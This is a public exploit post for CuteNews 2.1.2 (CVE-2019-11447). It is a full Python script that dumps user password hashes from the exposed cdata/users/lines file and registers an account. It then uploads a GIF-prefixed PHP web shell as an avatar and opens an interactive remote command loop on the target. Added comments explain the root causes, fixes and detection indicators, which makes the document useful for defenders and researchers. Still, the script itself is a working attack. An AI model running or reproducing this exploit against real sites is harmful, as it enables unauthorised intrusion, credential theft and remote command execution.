CuteNews 2.1.2 Remote Code Execution

2020-09-10 00:00:00
Musyoka Ian
packetstormsecurity.com
`# Exploit Title: CuteNews 2.1.2 - Remote Code Execution  
# Google Dork: N/A  
# Date: 2020-09-10  
# Exploit Author: Musyoka Ian  
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php  
# Software Link: https://cutephp.com/cutenews/downloading.php  
# Version: CuteNews 2.1.2  
# Tested on: Ubuntu 20.04, CuteNews 2.1.2  
# CVE : CVE-2019-11447  
  
#! /bin/env python3  
  
import requests  
from base64 import b64decode  
import io  
import re  
import string  
import random  
import sys  
  
  
banner = """  
  
  
_____ __ _ __ ___ ___ ___   
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |  
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/   
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/   
___ _________   
/ _ \/ ___/ __/   
/ , _/ /__/ _/   
/_/|_|\___/___/   
  
  
  
"""  
# Startup banner and usage line.  
print (banner)  
print ("[->] Usage python3 expoit.py")  
print ()  
# One requests session is shared by every function below, so any cookie the  
# server sets during registration carries over to the profile edit and the  
# later POSTs.  
sess = requests.session()  
# Bytes written into the uploaded "avatar": a GIF magic prefix followed by PHP  
# that runs the 'cmd' request parameter. The GIF prefix is presumably what  
# satisfies an image check on the upload path -- confirm against the CuteNews  
# upload handler. The defensive fix is a server-side extension/MIME allow-list  
# and storing uploads where PHP is not executed; a magic-byte check alone does  
# not stop this.  
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"  
# Base URL of the installation; every request appends "/CuteNews/..." to it,  
# so a trailing slash here yields a double slash in each URL.  
ip = input("Enter the URL> ")  
# Fetch /CuteNews/cdata/users/lines and print the password hashes found in it.  
# The file is the application's own user store: apart from a leading  
# "<?php die(...) ?>" guard line, each line is base64 whose decoded form  
# carries a "pass";s:64:"..." entry (the s:64: prefix looks like PHP's  
# serialized-string length marker -- TODO confirm). The guard only helps when  
# PHP executes the file; served as plain text it is inert.  
# Defensive fix: deny HTTP access to cdata/ at the web server or move it out  
# of the web root. GET requests to cdata/users/lines are a cheap log indicator.  
# Prints to stdout; returns None.  
def extract_credentials():  
global sess, ip  
url = f"{ip}/CuteNews/cdata/users/lines"  
encoded_creds = sess.get(url).text  
buff = io.StringIO(encoded_creds)  
chash = buff.readlines()  
# "Not Found" is detected from the body text, not the HTTP status code, so a  
# differently worded 404 page falls through to the decode loop below.  
if "Not Found" in encoded_creds:  
print ("[-] No hashes were found skipping!!!")  
return  
else:  
for line in chash:  
# Skip the PHP guard line; everything else is treated as base64.  
if "<?php die('Direct call - access denied'); ?>" not in line:  
# NOTE: b64decode sits outside the try below, so a line that is not valid  
# base64 raises binascii.Error and aborts the whole dump.  
credentials = b64decode(line)  
# The 64-character value is what the caller's banner labels a SHA-256.  
try:  
sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)  
print (sha_hash)  
# Bare except swallows everything: a record with no "pass" entry  
# (AttributeError on .group), bad UTF-8, and even KeyboardInterrupt.  
# Narrow to (AttributeError, UnicodeDecodeError) if this is reworked.  
except:  
pass  
# Create a throwaway account through the public self-registration form.  
# Username, nickname, password, confirmation and the local part of the email  
# are the same 10-character random string; the email domain is hack.me.  
# A 302 response is taken as success; any other status exits the process  
# without printing a reason.  
# Precondition on the application side is open self-registration: disable it  
# when the site does not need it. Registrations whose username, nickname and  
# password are identical, or that use this email domain, are an indicator of  
# this tool.  
def register():  
global sess, ip  
# SystemRandom is the OS CSPRNG; the value is a throwaway credential that is  
# printed to stdout on success anyway.  
userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))  
postdata = {  
"action" : "register",  
"regusername" : userpass,  
"regnickname" : userpass,  
"regpassword" : userpass,  
"confirm" : userpass,  
"regemail" : f"{userpass}@hack.me"  
}  
# allow_redirects=False so the 302 itself is observed instead of the page it  
# redirects to. The local name shadows the function; harmless here, rename  
# if the function is ever touched.  
register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)  
if 302 == register.status_code:  
print (f"[+] Registration successful with username: {userpass} and password: {userpass}")  
else:  
sys.exit()  
# Upload `payload` as the avatar of the account `sess` is logged in as, then  
# loop reading commands and POSTing each to the stored file.  
# Root cause on the application side: the avatar upload keeps the  
# client-supplied filename (here "<user>.php") and stores it under the  
# web-served uploads/ directory, where the server executes it. Defensive  
# fixes: allow-list avatar extensions and MIME types server-side, assign a  
# server-generated filename, and disable script execution in uploads/ (or  
# store avatars outside the web root). Detection: new .php files under  
# uploads/, and POST requests to uploads/*.php carrying a cmd parameter.  
# Parameters: payload -- file contents to upload (the module-level PHP string).  
# Never returns normally: loops until interrupted, or sys.exit()s on a 404.  
def send_payload(payload):  
global ip  
# The personal-settings page carries two hidden fields (__signature_key,  
# __signature_dsi) that are scraped and echoed back with the form, so  
# whatever anti-forgery role they play is not what is being bypassed. The  
# username is read from the first disabled input on the page -- fragile if  
# the template ever has more than one.  
token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text  
signature_key = re.search('signature_key" value="(.*?)"', token).group(1)  
signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)  
logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)  
print (f"signature_key: {signature_key}")  
print (f"signature_dsi: {signature_dsi}")  
print (f"logged in user: {logged_user}")  
  
# Multipart body: (None, value) is a plain form field; the avatar_file tuple  
# is (filename, content). The client-chosen ".php" extension is the crux.  
files = {  
"mod" : (None, "main"),  
"opt" : (None, "personal"),  
"__signature_key" : (None, f"{signature_key}"),  
"__signature_dsi" : (None, f"{signature_dsi}"),  
"editpassword" : (None, ""),  
"confirmpassword" : (None, ""),  
"editnickname" : (None, logged_user),  
"avatar_file" : (f"{logged_user}.php", payload),  
"more[site]" : (None, ""),  
"more[about]" : (None, "")  
}  
# Response body is kept but never inspected; the 404 check below is the only  
# signal that the upload did not land.  
payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text  
print("============================\nDropping to a SHELL\n============================")  
# Stored path is assumed to be uploads/avatar_<user>_<user>.php (inferred from  
# this URL only -- confirm against the upload handler if it stops matching).  
while True:  
print ()  
command = input("command > ")  
postdata = {"cmd" : command}  
output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)  
if 404 == output.status_code:  
print ("sorry i can't find your webshell try running the exploit again")  
sys.exit()  
else:  
# Drop the GIF magic prefix the stored file begins with before printing.  
output = re.sub("GIF8;", "", output.text)  
print (output.strip())  
  
# Entry point: dump hashes, register an account, upload the file, then enter  
# the command loop. Each helper exits the process on its own failure path, so  
# nothing is cleaned up: the registered account and the uploaded avatar remain  
# on the target, which is what an incident responder should look for.  
if __name__ == "__main__":  
print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")  
extract_credentials()  
print ("================================================================")  
print()  
print ("=============================\nRegistering a users\n=============================")  
register()  
print()  
print("=======================================================\nSending Payload\n=======================================================")  
send_payload(payload)  
print ()  
`